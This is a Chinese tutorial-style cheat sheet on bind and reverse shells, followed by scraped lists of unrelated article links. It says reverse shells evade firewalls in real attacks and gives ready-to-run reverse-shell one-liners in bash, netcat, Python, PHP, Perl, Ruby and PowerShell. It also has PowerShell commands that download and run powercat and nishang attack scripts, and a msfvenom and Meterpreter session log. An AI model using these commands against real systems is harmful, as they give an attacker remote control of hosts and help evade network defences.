正向shell和反向shell
正向shell：控制端主动发起连接去连接被控制端
反向shell：被控制端主动连接控制端
在实战中，大多数采用反向shell，因为正向shell有很多因素导致连接失败，
比如说硬件设备有防火墙，入侵防御系统等，还有网站防火墙，端口占用，权限不足等场景，特别是硬件设备如果你正向连接被防火墙拦截导致打草惊蛇，后期攻击相当繁琐。
反向shell：而被控制端主动向外发送的数据包通常都不会被拦截。

反向shell如下

Linux常见反向shell
bash反弹shell

nc -lvp 4444
bash -i>& /dev/tcp/192.168.11.12/4444 0>&1

nc反弹shell

nc -lvp 4444   nc 192.168.11.12 666
/bin/bash |nc 192.168.11.12 666
nc 192.168.11.12 999 -e /bin/bash  Linux

python反弹shell

nc -lvp 9999
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.11.12",9999));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP反弹shell

nc -lvp 6666
php -r '$sock=fsockopen("192.168.11.12",6666);exec("/bin/sh -i <&3 >&3 2>&3");'

Perl反弹shell

perl -e 'use Socket; $i="192.168.11.12";$p=7777;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

ruby反弹shell

nc -lvp 4444
ruby -rsocket -e'f=TCPSocket.open("192.168.11.12",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Windows反弹shell如下

powercat反弹shell
powercat（https://github.com/besimorhino/powercat ）为Powershell版的Netcat，

nc -vlp 6666
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.11.12 -p 6666 -e cmd

nishang反弹shell
Nishang(https://github.com/samratashok/nishang )是一个基于PowerShell的攻击框架，
集合了一些PowerShell攻击脚本和有效载荷，可反弹TCP/ UDP/ HTTP/HTTPS/ ICMP等类型shell。

nc -lvp 6666
powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 192.168.11.12 -port 6666

自定义powershell函数反弹shell

nc -lvp 6666
powershell -nop -c "$client = New-Object Net.Sockets.TCPClient('192.168.11.12',6666);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

正向shell如下
nc 正向shell

nc -lvp 8080 -e /bin/bash
nc 192.168.11.11 8080

msf木马正向shell

msfvenom -p windows/meterpreter/bind_tcp -f exe LPORT=80 -o shell.exemsf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf6 exploit(multi/handler) > set lport  80
lport => 80
msf6 exploit(multi/handler) > set rhost 192.168.1.108
rhost => 192.168.1.108
msf6 exploit(multi/handler) > run[*] Started bind TCP handler against 192.168.1.108:80
[*] Sending stage (175174 bytes) to 192.168.1.108
[*] Meterpreter session 1 opened (192.168.11.12:33071 -> 192.168.1.108:80 ) at 2022-02-01 20:28:13 +0800meterpreter > msf，payload模块
set payload windows/meterpreter/bind_tcp            正向
set payload windows/x64/meterpreter/reverse_tcp     反向

shell的正向和反向相关推荐

1. openresty开发系列2--nginx的简单安装，正向、反向代理及常用命令和信号控制介绍...

   openresty开发系列2--nginx的简单安装,正向.反向代理及常用命令和信号控制介绍 一.nginx的安装下载及编译安装 1.Nginx下载:nginx-1.13.0.tar.gz,下载到:/ ...

2. 【Multisim仿真】二极管加正向和反向电压测量实验

   [Multisim仿真]二极管加正向和反向电压测量实验 本仿真实验基于Multisim14上平台进行的. 实验一:给二极管施加正向电压实验演示 实验说明 先通过键盘按键:A和B键控制J1.J2两个开关 ...

3. Nginx代理——正向、反向代理，动静分离和负载均衡

   文章目录 一.Nginx代理概述 (1)什么是正向代理和反向代理 -正向代理: -反向代理 -反向代理和正向代理的区别 (2)配置代理 -Nginx代理配置语法 -配置正向代理 -Nginx反向代理示 ...

4. squid正向代理 反向代理 CDN加速

   文章目录 一.squid正向代理 反向代理 CDN加速. 1.正向代理 1.1如何实现正向代理 2.反向代理 2.1 如何实现反向代理 3.CDN加速 3.1.如何实现CDN加速 一.squid正向代 ...

5. nginx搭建本地服务器 正向代理 反向代理 动态资源 静态资源

   前言 在互联网架构中服务器分为Web服务器和应用服务器. Web服务器:一般指像nginx.apache这类的服务器,web服务器一般只能解析静态资源: 应用服务器:一般指像tomcat.jetty. ...

6. nginx和正向代理反向代理

   曾经对于nginx和正向代理反向代理,只闻其名,不知其意.在昨天参加师哥师姐的分享会的时候,在师哥师姐深入的讨论之中,了解了这个概念 首先介绍一下基本概念吧: Nginx (engine x) 是一个 ...

7. 电能表的有功、无功、正向、反向

   有功,是用户实际用掉的电量,单位是[千瓦时],俗称[度] 无功,是用户设备的无功电量(严谨的说法是无功需求),单位是[千乏时].这是交流电中特有的, 无功功率 只在电网中来回传送,基本上不消耗,但是它 ...

8. 基于Centos7.2的自选域名配置实现正向和反向解析以及部署并测试缓存DNS服务器

   自选域名配置实现正向和反向解析 (注:下文中 IP 192.168.200.101为我的虚拟机IP,涉及上述"192.168.200.101"以及"192.168.200 ...

9. nginx正向代理+反向代理

   目录 Nginx工作原理及模块介绍​​​​​​​ Nginx原理 负载均衡+反向代理 Nginx WEB服务器最主要就是各种模块的工作,模块从结构上分为核心模块.基础模块和第三方模块,其中三类模块分别 ...

最新文章

1. cachecloud:Redis云管理平台
2. android 活动外的类,Android – 活动外的startActivityForResult？
3. c++ 模板教程（c语言中文网） 自己运行实例
4. cesium学习之环境搭建
5. BZOJ4001 TJOI2015概率论（生成函数+卡特兰数）
6. 怎么用命令开远程主机的telnet服务 2
7. 算法 - 斐波那契数列问题（转自微信公众号码农翻身）
8. 80-15-020-原理-零拷贝-Netty零拷贝的原理
9. 随机事件、随机变量、概率、概率密度函数
10. App设计之路——WebApp浅谈
11. 超级简易的加法计算器
12. Iocomp Crack和ProEssentials Crack
13. ul导航条二级菜单被遮盖
14. c语言标准差函数std,std函数
15. pe卸载win10更新补丁_【pe卸载补丁】pe卸载全部补丁_pe+卸载补丁工具
16. getImageMatrix、getMatrix傻傻分不清
17. 重装系统（无法开机时候操作方法）
18. python实现数据恢复软件手机版下载_知名下载软件，总算出手机版了
19. 零散专题32 生成PDF
20. CH3-面向对象上 (4个案例实现)

热门文章

1. 自定义线程池拒绝策略缓解高并发下线程池压力
2. 分享一些程序员接私活、兼职的平台
3. 图/图的存储/图的遍历
4. 海淘、跨境电商国际物流对接那些坑
5. 看我如何快速拿下整个C段主机权限
6. 游戏机械键盘哪个好，为什么资深玩家选择Hyperx游戏机械键盘？
7. TFT和STN液晶区别
8. 安卓手机的指纹存储在手机内部有没有可能被窃取？
9. 订单超过 7 天不允许退货
10. 浪潮服务器维修报价,浪潮服务器报价网